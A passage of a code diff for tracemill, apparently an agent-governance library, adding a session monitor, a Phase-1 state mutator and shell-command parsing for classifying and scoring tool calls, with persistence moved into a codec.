+                tool_input.get("command", "") or tool_input.get("cmd", "")
+                if isinstance(tool_input, dict)
+                else ""
+            )
+            classification = self._classify_shell_for_assess(tool_name, command)
+            command_analysis = self._build_command_analysis(command) if command else None
+        else:
+            classification = classify_tool(classify_name, engine=self._engine)
+            command_analysis = None
+
+        # Derive engine literal
+        mech_str = (
+            classification.mechanism.value
+            if hasattr(classification.mechanism, "value")
+            else str(classification.mechanism)
+        ).lower()
+        if "shell" in mech_str or "process" in mech_str:
+            engine_literal = "shell"
+        elif "mcp" in mech_str:
+            engine_literal = "mcp"
+        else:
+            engine_literal = "coding"
+
+        return EnrichmentContext(
+            event=event,
+            base_classification=classification,
+            command_analysis=command_analysis,
+            session_state=None,
+            mcp_profiles=None,
+            project_root=self._project_root,
+            engine=engine_literal,
+            drift_baseline=None,
+            mcp_profile_key=server_namespace,
+        )
+
+    def _classify_shell_for_assess(self, tool_name: str, command: str):
+        """Shell dialect dispatch for assessment."""
+        from tracemill.classify.cmd import classify_cmd_command
+        from tracemill.classify.coding import CodingMechanism
+        from tracemill.classify.core import Classification
+        from tracemill.classify.powershell import classify_powershell_command
+        from tracemill.classify.shell import classify_shell
+
+        if not command:
+            return Classification(mechanism=CodingMechanism.PROCESS_SHELL, effect=None)
+        lower = tool_name.lower()
+        if lower in ("powershell", "pwsh"):
+            return classify_powershell_command(command, engine=self._engine)
+        if lower == "cmd":
+            return classify_cmd_command(command, engine=self._engine)
+        return classify_shell(command, engine=self._engine)
+
+    def _build_command_analysis(self, command: str):
+        """Build CommandAnalysis using the shell classifier's unwrap logic."""
+        import shlex
+
+        from tracemill.classify.shell import _unwrap_binary
+        from tracemill.governance.types import CommandAnalysis, PipeSegment
+
+        if not command or not command.strip():
+            return None
+        try:
+            tokens = shlex.split(command)
+        except ValueError:
+            tokens = command.split()
+        if not tokens:
+            return None
+
+        binary, _subcmd, flags, _caps = _unwrap_binary(tokens, engine=self._engine)
+        targets = tuple(t for t in tokens[1:] if not t.startswith("-") and t != binary)
+
+        pipe_segments = None
+        if "|" in command and "||" not in command and "|&" not in command:
+            try:
+                lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
+                lexer.whitespace_split = False
+                all_tokens = list(lexer)
+                if "|" in all_tokens:
+                    segments: list[PipeSegment] = []
+                    current: list[str] = []
+                    for tok in all_tokens:
+                        if tok == "|":
+                            if current:
+                                b, _s, f, _c = _unwrap_binary(current, engine=self._engine)
+                                t = tuple(
+                                    x for x in current[1:] if not x.startswith("-") and x != b
+                                )
+                                segments.append(
+                                    PipeSegment(binary=b or current[0], flags=tuple(f), targets=t)
+                                )
+                            current = []
+                        else:
+                            current.append(tok)
+                    if current:
+                        b, _s, f, _c = _unwrap_binary(current, engine=self._engine)
+                        t = tuple(x for x in current[1:] if not x.startswith("-") and x != b)
+                        segments.append(
+                            PipeSegment(binary=b or current[0], flags=tuple(f), targets=t)
+                        )
+                    if len(segments) > 1:
+                        pipe_segments = tuple(segments)
+            except ValueError:
+                pass
+
+        return CommandAnalysis(
+            command=command,
+            binary=binary or tokens[0],
+            flags=tuple(flags),
+            targets=targets,
+            pipe_segments=pipe_segments,
+        )

--- a/src/tracemill/governance/monitor.py
+++ b/src/tracemill/governance/monitor.py
@@ -1,0 +1,446 @@
+"""The single-writer observation path for governance.
+
+SessionMonitor is the only component that mutates and persists session state. It
+owns the durable write pipeline: idempotency reservation, atomic Phase-1 commit,
+Phase 2/3 finalization, crash recovery, the Phase 2/3 circuit breaker, deferred
+MCP writes, and session-summary finalization. It also owns the reservation
+bookkeeping (write-failure and Phase-2/3 retry counters). The read side
+(previews, scoring) lives in the Scorer; the Monitor never previews.
+"""
+
+from __future__ import annotations
+
+import json
+import sqlite3
+from datetime import datetime, timezone
+from typing import TYPE_CHECKING
+
+from tracemill.governance.results import SessionMeta
+
+if TYPE_CHECKING:
+    import tracemill.types
+
+    from tracemill.governance.assessor import Assessor
+    from tracemill.governance.codec import MetaCodec
+    from tracemill.governance.context import ContextBuilder
+    from tracemill.governance.persistence import SystemStore
+    from tracemill.governance.phase1 import Phase1
+    from tracemill.governance.registry import SessionRegistry
+    from tracemill.governance.state import SessionState, SessionStateSnapshot
+    from tracemill.governance.types import EnrichmentContext
+
+
+class SessionMonitor:
+    """Single writer: observe events, mutate + persist session state, finalize."""
+
+    def __init__(
+        self,
+        context: "ContextBuilder",
+        phase1: "Phase1",
+        assessor: "Assessor",
+        registry: "SessionRegistry",
+        store: "SystemStore",
+        codec: "MetaCodec",
+    ) -> None:
+        self._context = context
+        self._phase1 = phase1
+        self._assessor = assessor
+        self._registry = registry
+        self._store = store
+        self._codec = codec
+        self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
+        self._MAX_WRITE_FAILURES = 10
+        self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
+        self._phase23_session_keys: dict[
+            str, set[str]
+        ] = {}  # session_id → set of event keys with attempts
+        self._MAX_PHASE23_ATTEMPTS = 3
+
+    def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta | None":
+        """Observation-path scoring for use as a live pipeline stage.
+
+        Unlike :meth:`Scorer.score_tool_call_event` (read-only preflight), this
+        runs the state-mutating observation path and returns the ``SessionMeta``
+        to stamp onto the event's ``metadata.governance`` — or ``None`` when the
+        event is not governance-relevant.
+
+        This is the method :class:`~tracemill.pipeline.EventPipeline` calls when a
+        governance stage is wired in, making governance one stage of the pipeline
+        rather than a separate track. Because the stage sees *every* event kind at
+        the sink choke point, it must dispatch by kind:
+
+        * Session lifecycle (``session.started`` / ``session.ended``) →
+          :meth:`process_lifecycle` (Phase 1 only; ``session.ended`` also
+          finalizes the summary and evicts session state).
+        * Tool calls → the state-mutating :meth:`process_event`. Every
+          ``tool.call.completed`` is scored; a ``tool.call.started`` is scored
+          only when it is an id-bearing orphan (an unpaired start flushed at
+          session end / pipeline close, or a displaced duplicate), since the
+          Enricher buffers a paired start into its completion and emits a no-id
+          start's completion separately. This keeps each real tool call observed
+          exactly once.
+        * Any other kind (messages, turns, llm/planning chunks, spans, usage, …)
+          is *not* a tool call and must not advance the tool-call budget, so it is
+          left ungoverned (``None`` → no ``metadata.governance`` stamp).
+        """
+        from tracemill.types import EventKind
+
+        kind = event.kind
+        if kind == EventKind.SESSION_STARTED:
+            return self.process_lifecycle(event.session_id, "session_start")
+        if kind == EventKind.SESSION_ENDED:
+            return self.process_lifecycle(event.session_id, "session_end")
+        if kind == EventKind.TOOL_CALL_COMPLETED:
+            return self.process_event(self._context.from_session_event(event))
+        if kind == EventKind.TOOL_CALL_STARTED:
+            # A started event only reaches the stage (rather than being buffered)
+            # as either a genuine orphan — an unpaired start flushed at session
+            # end / pipeline close, or a displaced duplicate, all of which carry a
+            # tool_call_id and MUST be scored since no completion will — or a no-id
+            # "provisional" start the Enricher cannot pair, whose completion is
+            # emitted and scored separately. Scoring the latter would double-count,
+            # so discriminate on the same id the Enricher pairs on.
+            from tracemill.enricher import _extract_tool_call_id
+
+            if _extract_tool_call_id(event) is None:
+                return None
+            return self.process_event(self._context.from_session_event(event))
+        return None
+
+    def get_or_create_state(self, session_id: str) -> "SessionState":
+        """Get or create session state, rehydrating from the store on a miss."""
+        return self._registry.get_or_create(session_id)
+
+    def process_lifecycle(self, session_id: str, event_kind: str) -> SessionMeta:
+        """Handle session_start/end — Phase 1 only, skip Phase 2/3."""
+
+        state = self.get_or_create_state(session_id)
+
+        if event_kind == "session_start":
+            # Initialize state (idempotent — load_from_db handles fresh sessions)
+            pass
+        elif event_kind == "session_end":
+            # Finalize: write session summary
+            snapshot = state.snapshot()
+            self._write_session_summary(session_id, snapshot)
+            # Evict session state to prevent unbounded memory growth
+            self._registry.evict(session_id)
+            self._write_failures.pop(session_id, None)
+            # Clean up any lingering phase23 attempts for this session's events
+            for key in self._phase23_session_keys.pop(session_id, set()):
+                self._phase23_attempts.pop(key, None)
+
+        snapshot = state.snapshot()
+        return SessionMeta(
+            classification=None,
+            risk_assessment=None,
+            recommendation=None,
+            budget_snapshot=snapshot.budget,
+            drift=None,
+            mcp_alerts=(),
+            evidence=None,
+        )
+
+    def process_event(self, ctx: "EnrichmentContext") -> SessionMeta:
+        """Full pipeline: Phase 1 → Phase 2 → Phase 3 → SessionMeta."""
+
+        event = ctx.event
+        session_id = event.session_id
+
+        # ── Phase 1: State Mutation ──
+        # Idempotency check BEFORE loading state (prevents resurrection of ended sessions)
+        existing = self._store.is_duplicate(event.source_event_key)
+        if existing:
+            meta_dict = json.loads(existing)
+            if not meta_dict.get("reserved"):
+                return self._codec.deserialize_meta(meta_dict)
+            # Reserved = Phase 1 completed atomically. Skip Phase 1, re-run Phase 2/3 only.
+            # Restore attempt count from persisted reservation (survives restarts)
+            persisted_attempts = meta_dict.get("phase23_attempts", 0)
+            if event.source_event_key not in self._phase23_attempts:
+                self._phase23_attempts[event.source_event_key] = persisted_attempts
+
+        state = self.get_or_create_state(session_id)
+
+        if not existing:
+            # Phase 1 mutations (in-memory) — wrapped for crash recovery
+            try:
+                self._phase1.apply(ctx, state)
+            except Exception as phase1_exc:
+                import logging
+
+                logging.getLogger(__name__).error(
+                    "Phase 1 mutation failed for session %s event %s: %s — discarding state",
+                    session_id,
+                    event.source_event_key,
+                    phase1_exc,
+                )
+                # Discard corrupted in-memory state — reload clean from DB
+                self._registry.evict(session_id)
+                state = self.get_or_create_state(session_id)
+                return SessionMeta(
+                    classification=None,
+                    risk_assessment=None,
+                    recommendation=None,
+                    budget_snapshot=state.snapshot().budget,
+                    drift=None,
+                    mcp_alerts=(),
+                    evidence=None,
+                )
+
+            # Atomic commit: state persist + reservation in single transaction
+            # Include Phase-1 snapshot in reservation so retries use event-time state
+            now = datetime.now(timezone.utc).isoformat()
+            snapshot_for_reservation = state.snapshot()
+            reservation_data = {
+                "reserved": True,
+                "snapshot": self._codec.serialize_snapshot(snapshot_for_reservation),
+            }
+            reservation_json = json.dumps(reservation_data)
+            try:
+                state.persist_no_commit()
+                self._store.execute_in_transaction(
+                    "INSERT OR IGNORE INTO processed_events (source_event_key, session_id, session_meta_json, processed_at) VALUES (?, ?, ?, ?)",
+                    (event.source_event_key, session_id, reservation_json, now),
+                )
+                self._store.commit()
+                self._write_failures[session_id] = 0
+                self._store.cache_processed(event.source_event_key, reservation_json)
+            except (sqlite3.OperationalError, sqlite3.IntegrityError) as e:
+                import logging
+
+                logging.getLogger(__name__).warning(
+                    "Atomic Phase 1 commit failed for session %s: %s — discarding in-memory mutations, will retry on next delivery",
+                    session_id,
+                    e,
+                )
+                self._store.rollback()
+                # Discard corrupted in-memory state — reload clean from DB
+                self._registry.evict(session_id)
+                state = self.get_or_create_state(session_id)
+                # Return degraded response — event will be re-delivered
+                return SessionMeta(
+                    classification=None,
+                    risk_assessment=None,
+                    recommendation=None,
+                    budget_snapshot=state.snapshot().budget,
+                    drift=None,
+                    mcp_alerts=(),
+                    evidence=None,
+                )
+
+        # ── Phase 2: Labeling (side-effect-free) ──
+        # Circuit breaker: if Phase 2/3 crashes consistently, dead-letter the event
+        # For retries (existing=reserved), use the persisted event-time snapshot
+        if existing:
+            snapshot_data = meta_dict.get("snapshot")
+            if snapshot_data:
+                snapshot = self._codec.deserialize_snapshot(snapshot_data)
+            else:
+                # Legacy reservation without snapshot — fall back to current state
+                snapshot = state.snapshot()
+        else:
+            snapshot = snapshot_for_reservation
+        try:
+            assessment = self._assessor.assess(ctx, snapshot)
+        except Exception as phase23_exc:
+            import logging
+
+            logger = logging.getLogger(__name__)
+            # Increment attempt counter and dead-letter after max retries
+            attempts = self._phase23_attempts.get(event.source_event_key, 0) + 1
+            self._phase23_attempts[event.source_event_key] = attempts
+            # Track which session owns this key for cleanup on session_end
+            self._phase23_session_keys.setdefault(session_id, set()).add(event.source_event_key)
+            if attempts >= self._MAX_PHASE23_ATTEMPTS:
+                logger.error(
+                    "Event %s failed Phase 2/3 %d times — dead-lettering: %s",
+                    event.source_event_key,
+                    attempts,
+                    phase23_exc,
+                )
+                # Finalize with degraded meta so event stops retrying
+                degraded_meta = SessionMeta(
+                    classification=None,
+                    risk_assessment=None,
+                    recommendation=None,
+                    budget_snapshot=snapshot.budget,
+                    drift=None,
+                    mcp_alerts=(),
+                    evidence=None,
+                )
+                degraded_json = json.dumps(
+                    {
+                        **self._codec.serialize_meta(degraded_meta),
+                        "dead_lettered": True,
+                        "error": str(phase23_exc),
+                        "attempts": attempts,
+                    }
+                )
+                try:
+                    self._store.execute_in_transaction(
+                        "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
+                        (degraded_json, event.source_event_key),
+                    )
+                    self._store.commit()
+                    self._store.cache_processed(event.source_event_key, degraded_json)
+                    # Only clear attempts after successful dead-letter persistence
+                    del self._phase23_attempts[event.source_event_key]
+                    # Clean session key tracking
+                    dl_keys = self._phase23_session_keys.get(session_id)
+                    if dl_keys:
+                        dl_keys.discard(event.source_event_key)
+                        if not dl_keys:
+                            del self._phase23_session_keys[session_id]
+                except (sqlite3.OperationalError, sqlite3.IntegrityError):
+                    self._store.rollback()
+                    # Keep attempt count — next retry will try dead-lettering again
+                return degraded_meta
+            else:
+                logger.warning(
+                    "Event %s Phase 2/3 attempt %d/%d failed: %s — will retry on next delivery",
+                    event.source_event_key,
+                    attempts,
+                    self._MAX_PHASE23_ATTEMPTS,
+                    phase23_exc,
+                )
+                # Persist attempt count in reservation so it survives process restarts
+                # Preserve the snapshot so retries still use event-time state
+                try:
+                    reservation_json = json.dumps(
+                        {
+                            "reserved": True,
+                            "phase23_attempts": attempts,
+                            "snapshot": self._codec.serialize_snapshot(snapshot),
+                        }
+                    )
+                    self._store.execute_in_transaction(
+                        "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
+                        (reservation_json, event.source_event_key),
+                    )
+                    self._store.commit()
+                    self._store.cache_processed(event.source_event_key, reservation_json)
+                except (sqlite3.OperationalError, sqlite3.IntegrityError):
+                    self._store.rollback()
+                return SessionMeta(
+                    classification=None,
+                    risk_assessment=None,
+                    recommendation=None,
+                    budget_snapshot=snapshot.budget,
+                    drift=None,
+                    mcp_alerts=(),
+                    evidence=None,
+                )
+
+        # Phase 2/3 succeeded — clear retry counter ONLY after finalization commits (below)
+        phase23_key_to_clear = event.source_event_key
+
+        # Assessment succeeded — surface its verdict + deferred MCP writes
+        meta = assessment.meta
+
+        # Finalize idempotency record + deferred MCP writes in single transaction
+        try:
+            meta_json = json.dumps(self._codec.serialize_meta(meta))
+            self._store.execute_in_transaction(
+                "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
+                (meta_json, event.source_event_key),
+            )
+            if assessment.mcp_deferred_writes:
+                self._commit_mcp_writes_no_commit(assessment.mcp_deferred_writes)
+            self._store.commit()
+            self._store.cache_processed(event.source_event_key, meta_json)
+        except (
+            sqlite3.OperationalError,
+            sqlite3.IntegrityError,
+            json.JSONDecodeError,
+            KeyError,
+            TypeError,
+            ValueError,
+            AttributeError,
+        ) as e:
+            import logging
+
+            logging.getLogger(__name__).error(
+                "Finalization commit failed for event %s: %s — will retry on next delivery",
+                event.source_event_key,
+                e,
+            )
+            self._store.rollback()
+            # Event stays reserved; next delivery re-runs Phase 2/3
+            # Do NOT clear retry counter — finalization did not commit
+            return SessionMeta(
+                classification=meta.classification,
+                risk_assessment=meta.risk_assessment,
+                recommendation=meta.recommendation,
+                budget_snapshot=snapshot.budget,
+                drift=None,
+                mcp_alerts=(),
+                evidence=None,
+            )
+
+        # Only clear retry counter after successful finalization commit
+        self._phase23_attempts.pop(phase23_key_to_clear, None)
+        # Also clean session key tracking to prevent unbounded growth
+        session_keys = self._phase23_session_keys.get(session_id)
+        if session_keys:
+            session_keys.discard(phase23_key_to_clear)
+            if not session_keys:
+                del self._phase23_session_keys[session_id]
+        return meta
+
+    def _commit_mcp_writes_no_commit(self, writes: tuple) -> None:
+        """Execute deferred MCP writes without committing — caller owns transaction."""
+        for write in writes:
+            if write.kind == "upsert":
+                profile = json.loads(write.payload)
+                self._store.execute_in_transaction(
+                    """INSERT OR IGNORE INTO mcp_fingerprints
+                       (server, tool_name, description_hash, schema_hash, registered_effect,
+                        registered_role, registered_capabilities, registered_scope, clearance, first_seen, last_seen)
+                       VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)""",
+                    (
+                        write.server,
+                        write.tool_name,
+                        profile["description_hash"],
+                        profile["schema_hash"],
+                        profile.get("registered_effect"),
+                        profile.get("registered_role"),
+                        profile.get("registered_capabilities"),
+                        profile.get("registered_scope"),
+                        profile.get("clearance"),
+                        profile["first_seen"],
+                        profile["last_seen"],
+                    ),
+                )
+            elif write.kind == "last_seen":
+                self._store.execute_in_transaction(
+                    "UPDATE mcp_fingerprints SET last_seen = ? WHERE server = ? AND tool_name = ?",
+                    (write.payload, write.server, write.tool_name),
+                )
+
+    def _write_session_summary(self, session_id: str, snapshot: "SessionStateSnapshot") -> None:
+        """Write session summary to session_summaries table (idempotent — won't overwrite existing)."""
+        import json as json_mod
+        import logging
+
+        now = datetime.now(timezone.utc).isoformat()
+        budget_json = json_mod.dumps(
+            {
+                "total_tool_calls": snapshot.budget.total_tool_calls,
+                "total_tokens": snapshot.budget.total_tokens,
+                "pressure": snapshot.budget.pressure,
+            }
+        )
+        try:
+            # INSERT OR IGNORE: first delivery records started_at/ended_at; duplicates are no-ops
+            self._store.connection.execute(
+                """INSERT OR IGNORE INTO session_summaries
+                   (session_id, started_at, ended_at, total_events, dropped_events, budget_snapshot_json)
+                   VALUES (?, ?, ?, ?, ?, ?)""",
+                (session_id, now, now, snapshot.event_count, snapshot.dropped_events, budget_json),
+            )
+            self._store.connection.commit()
+        except sqlite3.OperationalError as e:
+            logging.getLogger(__name__).warning(
+                "Failed to write session summary for %s: %s", session_id, e
+            )

--- a/src/tracemill/governance/phase1.py
+++ b/src/tracemill/governance/phase1.py
@@ -1,0 +1,69 @@
+"""Phase 1 of governance enrichment: session-state mutation.
+
+Phase 1 is the single mutable step in the pipeline. It advances the per-session
+accumulator in place — phase window, budget counters, information-flow taint,
+and pressure — from an EnrichmentContext. It is isolated here so the durable
+writer (process_event) and the non-persisted preview (preflight_event, which
+runs it against a detached clone) share exactly one definition of what Phase 1
+does; the caller alone decides whether the mutated state is persisted.
+"""
+
+from __future__ import annotations
+
+from typing import TYPE_CHECKING
+
+if TYPE_CHECKING:
+    from tracemill.governance.budget import BudgetTracker
+    from tracemill.governance.labeler import GovernanceLabeler
+    from tracemill.governance.state import SessionState
+    from tracemill.governance.types import EnrichmentContext
+
+
+class Phase1:
+    """Apply Phase-1 state mutations (phase window, budget, IFC taint, pressure)."""
+
+    def __init__(self, budget: "BudgetTracker", labeler: "GovernanceLabeler") -> None:
+        self._budget = budget
+        self._labeler = labeler
+
+    def infer_phase(self, ctx: "EnrichmentContext") -> str | None:
+        """Infer session phase from classification/event."""
+        from tracemill.governance.types import ToolCallEvent
+
+        cls = ctx.base_classification
+        # Network capability takes priority
+        if "network_outbound" in cls.capability:
+            return "network"
+        if cls.effect == "read_only":
+            return "exploration"
+        if cls.effect == "destructive":
+            return "destructive"
+        if cls.effect == "mutating":
+            tool_name = ""
+            if isinstance(ctx.event, ToolCallEvent):
+                tool_name = (ctx.event.tool_name or "").lower()
+            if "test" in tool_name or "verify" in tool_name or "check" in tool_name:
+                return "testing"
+            if "deploy" in tool_name or "publish" in tool_name:
+                return "deployment"
+            return "implementation"
+        if cls.effect == "informational":
+            return "exploration"
+        return "exploration"
+
+    def apply(self, ctx: "EnrichmentContext", state: "SessionState") -> None:
+        """Run the Phase-1 mutation sequence against ``state`` in place.
+
+        Persistence is the caller's concern: process_event applies this to the
+        registry-resident state and then commits it atomically; preflight_event
+        applies it to a detached clone and never persists.
+        """
+        phase = self.infer_phase(ctx)
+        if phase:
+            state.update_phase_window(phase)
+        self._budget.increment(ctx, state)
+        if self._labeler.has_ifc:
+            ifc_src_labels: set[str] = set()
+            self._labeler.check_ifc(ctx, ifc_src_labels, state)
+        state.record_event(None)
+        self._budget.check_pressure(state)

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -9,16 +9,13 @@ from datetime import datetime, timezone
 from typing import TYPE_CHECKING, Literal
 
 from tracemill.governance.assessor import DefaultAssessor
+from tracemill.governance.codec import MetaCodec
 from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.shield import Shield
 from tracemill.governance.results import (
-    Evidence,
-    EvidencePointer,
-    EscalationContext,
     RecommendedAction,
     RiskRecommendation,
     SessionMeta,
-    TransformSuggestion,
 )
 
 if TYPE_CHECKING:
@@ -37,19 +34,6 @@ if TYPE_CHECKING:
     from tracemill.sdk.gate_policy import GatePolicy
     from tracemill.sdk.gate_types import PostflightVerdict
     from tracemill.sdk.verdict import Verdict
-
-
-def _decode_budget_dims(raw: list | None) -> tuple[tuple[str, int], ...]:
-    """Safely decode budget dimension pairs from JSON, skipping malformed entries."""
-    if not raw:
-        return ()
-    result = []
-    for item in raw:
-        if isinstance(item, (list, tuple)) and len(item) == 2:
-            key, val = item
-            if isinstance(key, str) and isinstance(val, (int, float)):
-                result.append((key, int(val)))
-    return tuple(result)
 
 
 def _import_dotted(dotted_path: str):
@@ -88,6 +72,7 @@ class GovernancePipeline:
         self._registry = SessionRegistry(store)
         self._assessor = DefaultAssessor(labeler, rules, engine)
         self._shield = Shield(self._registry, lambda: self.policy, self._score_event)
+        self._codec = MetaCodec()
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -637,7 +622,7 @@ class GovernancePipeline:
         'what we recommended' vs 'what actually happened'.
         """
         try:
-            meta_dict = self._serialize_meta(meta)
+            meta_dict = self._codec.serialize_meta(meta)
             meta_dict["scored"] = True
             meta_json = json.dumps(meta_dict)
             now = datetime.now(timezone.utc).isoformat()
@@ -764,7 +749,7 @@ class GovernancePipeline:
         if existing:
             meta_dict = json.loads(existing)
             if not meta_dict.get("reserved"):
-                return self._deserialize_meta(meta_dict)
+                return self._codec.deserialize_meta(meta_dict)
             # Reserved = Phase 1 completed atomically. Skip Phase 1, re-run Phase 2/3 only.
             # Restore attempt count from persisted reservation (survives restarts)
             persisted_attempts = meta_dict.get("phase23_attempts", 0)
@@ -816,7 +801,7 @@ class GovernancePipeline:
             snapshot_for_reservation = state.snapshot()
             reservation_data = {
                 "reserved": True,
-                "snapshot": self._serialize_snapshot(snapshot_for_reservation),
+                "snapshot": self._codec.serialize_snapshot(snapshot_for_reservation),
             }
             reservation_json = json.dumps(reservation_data)
             try:
@@ -857,7 +842,7 @@ class GovernancePipeline:
         if existing:
             snapshot_data = meta_dict.get("snapshot")
             if snapshot_data:
-                snapshot = self._deserialize_snapshot(snapshot_data)
+                snapshot = self._codec.deserialize_snapshot(snapshot_data)
             else:
                 # Legacy reservation without snapshot — fall back to current state
                 snapshot = state.snapshot()
@@ -893,7 +878,7 @@ class GovernancePipeline:
                 )
                 degraded_json = json.dumps(
                     {
-                        **self._serialize_meta(degraded_meta),
+                        **self._codec.serialize_meta(degraded_meta),
                         "dead_lettered": True,
                         "error": str(phase23_exc),
                         "attempts": attempts,
@@ -933,7 +918,7 @@ class GovernancePipeline:
                         {
                             "reserved": True,
                             "phase23_attempts": attempts,
-                            "snapshot": self._serialize_snapshot(snapshot),
+                            "snapshot": self._codec.serialize_snapshot(snapshot),
                         }
                     )
                     self._store.execute_in_transaction(
@@ -962,7 +947,7 @@ class GovernancePipeline:
 
         # Finalize idempotency record + deferred MCP writes in single transaction
         try:
-            meta_json = json.dumps(self._serialize_meta(meta))
+            meta_json = json.dumps(self._codec.serialize_meta(meta))
             self._store.execute_in_transaction(
                 "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
                 (meta_json, event.source_event_key),
@@ -1091,370 +1076,6 @@ class GovernancePipeline:
             logging.getLogger(__name__).warning(
                 "Failed to write session summary for %s: %s", session_id, e
             )
-
-    def _serialize_snapshot(self, snapshot: "SessionStateSnapshot") -> dict:
-        """Serialize Phase-1 snapshot for reservation persistence."""
-        return {
-            "budget": {
-                "total_tool_calls": snapshot.budget.total_tool_calls,
-                "total_tokens": snapshot.budget.total_tokens,
-                "elapsed_seconds": snapshot.budget.elapsed_seconds,
-                "pressure": snapshot.budget.pressure,
-                "by_effect": list(snapshot.budget.by_effect),
-                "by_capability": list(snapshot.budget.by_capability),
-                "by_scope": list(snapshot.budget.by_scope),
-                "by_role": list(snapshot.budget.by_role),
-                "by_phase": list(snapshot.budget.by_phase),
-                "by_mechanism": list(snapshot.budget.by_mechanism),
-                "by_action": list(snapshot.budget.by_action),
-                "by_structure": list(snapshot.budget.by_structure),
-            },
-            "phase_window": list(snapshot.phase_window),
-            "taint_ledger": [
-                {
-                    "event_id": t.event_id,
-                    "source_event_key": t.source_event_key,
-                    "clearance": t.clearance,
-                    "source": t.source,
-                    "payload_pointer": t.payload_pointer,
-                }
-                for t in snapshot.taint_ledger
-            ],
-            "last_assistant_event_id": snapshot.last_assistant_event_id,
-            "last_user_event_id": snapshot.last_user_event_id,
-            "event_count": snapshot.event_count,
-            "dropped_events": snapshot.dropped_events,
-            "last_sequence": snapshot.last_sequence,
-            "gap_ordinal": snapshot.gap_ordinal,
-        }
-
-    def _deserialize_snapshot(self, data: dict) -> "SessionStateSnapshot":
-        """Reconstruct snapshot from persisted reservation."""
-        from tracemill.governance.state import BudgetSnapshot, SessionStateSnapshot, TaintEntry
-
-        budget_data = data.get("budget", {})
-        budget = BudgetSnapshot(
-            total_tool_calls=budget_data.get("total_tool_calls", 0),
-            total_tokens=budget_data.get("total_tokens", 0),
-            elapsed_seconds=budget_data.get("elapsed_seconds", 0.0),
-            by_effect=_decode_budget_dims(budget_data.get("by_effect", ())),
-            by_capability=_decode_budget_dims(budget_data.get("by_capability", ())),
-            by_scope=_decode_budget_dims(budget_data.get("by_scope", ())),
-            by_role=_decode_budget_dims(budget_data.get("by_role", ())),
-            by_phase=_decode_budget_dims(budget_data.get("by_phase", ())),
-            by_mechanism=_decode_budget_dims(budget_data.get("by_mechanism", ())),
-            by_action=_decode_budget_dims(budget_data.get("by_action", ())),
-            by_structure=_decode_budget_dims(budget_data.get("by_structure", ())),
-            pressure=budget_data.get("pressure", False),
-        )
-        taints = tuple(
-            TaintEntry(
-                event_id=t["event_id"],
-                source_event_key=t.get("source_event_key") or t["event_id"],
-                clearance=t["clearance"],
-                source=t["source"],
-                payload_pointer=t["payload_pointer"],
-            )
-            for t in data.get("taint_ledger", ())
-        )
-        return SessionStateSnapshot(
-            budget=budget,
-            phase_window=tuple(data.get("phase_window", ())),
-            taint_ledger=taints,
-            last_assistant_event_id=data.get("last_assistant_event_id"),
-            last_user_event_id=data.get("last_user_event_id"),
-            event_count=data.get("event_count", 0),
-            dropped_events=data.get("dropped_events", 0),
-            last_sequence=data.get("last_sequence"),
-            gap_ordinal=data.get("gap_ordinal", 0),
-        )
-
-    def _deserialize_escalation(self, data: dict | None) -> "EscalationContext | None":
-        """Reconstruct EscalationContext from cached evidence data."""
-        if not data:
-            return None
-        from tracemill.classify.core import Classification
-
-        cls = (
-            Classification.from_dict(data["classification"]) if data.get("classification") else None
-        )
-        action_val = data.get("recommended_action", "allow")
-        action = (
-            RecommendedAction(action_val)
-            if action_val in tuple(RecommendedAction)
-            else RecommendedAction.ALLOW
-        )
-        return EscalationContext(
-            canonical_id=data.get("canonical_id", ""),
-            classification=cls,
-            recommended_action=action,
-            reason_code=data.get("reason_code", ""),
-            mitre_techniques=tuple(data.get("mitre_techniques", ())),
-            drift=None,  # Drift is session-contextual, not cached
-            budget_snapshot=None,
-            pii_taint=data.get("pii_taint", False),
-            ifc_violations=data.get("ifc_violations", 0),
-            tool_name=data.get("tool_name", ""),
-            tool_args_summary=data.get("tool_args_summary", ""),
-            session_id=data.get("session_id", ""),
-            timestamp=datetime.fromisoformat(data["timestamp"])
-            if data.get("timestamp")
-            else datetime.now(timezone.utc),
-        )
-
-    def _serialize_meta(self, meta: SessionMeta) -> dict:
-        """Full serialization for idempotency cache — preserves all governance decisions."""
-        rec_data = None
-        if meta.recommendation:
-            transform_data = None
-            if meta.recommendation.transform:
-                transform_data = {
-                    "target_kind": meta.recommendation.transform.target_kind,
-                    "path": meta.recommendation.transform.path,
-                    "original": meta.recommendation.transform.original,
-                    "replacement": meta.recommendation.transform.replacement,
-                    "rationale": meta.recommendation.transform.rationale,
-                    "confidence": meta.recommendation.transform.confidence,
-                }
-            rec_data = {
-                "action": str(meta.recommendation.recommended_action),
-                "reason_code": meta.recommendation.reason_code,
-                "canonical_id": meta.recommendation.canonical_id,
-                "message": meta.recommendation.message,
-                "transform": transform_data,
-            }
-        risk_data = None
-        if meta.risk_assessment:
-            risk_data = {
-                "score": meta.risk_assessment.score,
-                "level": meta.risk_assessment.level,
-                "confidence": meta.risk_assessment.confidence,
-                "factors": list(meta.risk_assessment.factors),
-                "mitre": list(meta.risk_assessment.mitre),
-            }
-        cls_data = None
-        if meta.classification:
-            cls_data = meta.classification.to_dict()
-        budget_data = None
-        if meta.budget_snapshot:
-            budget_data = {
-                "total_tool_calls": meta.budget_snapshot.total_tool_calls,
-                "total_tokens": meta.budget_snapshot.total_tokens,
-                "elapsed_seconds": meta.budget_snapshot.elapsed_seconds,
-                "pressure": meta.budget_snapshot.pressure,
-                "by_effect": list(meta.budget_snapshot.by_effect),
-                "by_capability": list(meta.budget_snapshot.by_capability),
-                "by_scope": list(meta.budget_snapshot.by_scope),
-                "by_role": list(meta.budget_snapshot.by_role),
-                "by_phase": list(meta.budget_snapshot.by_phase),
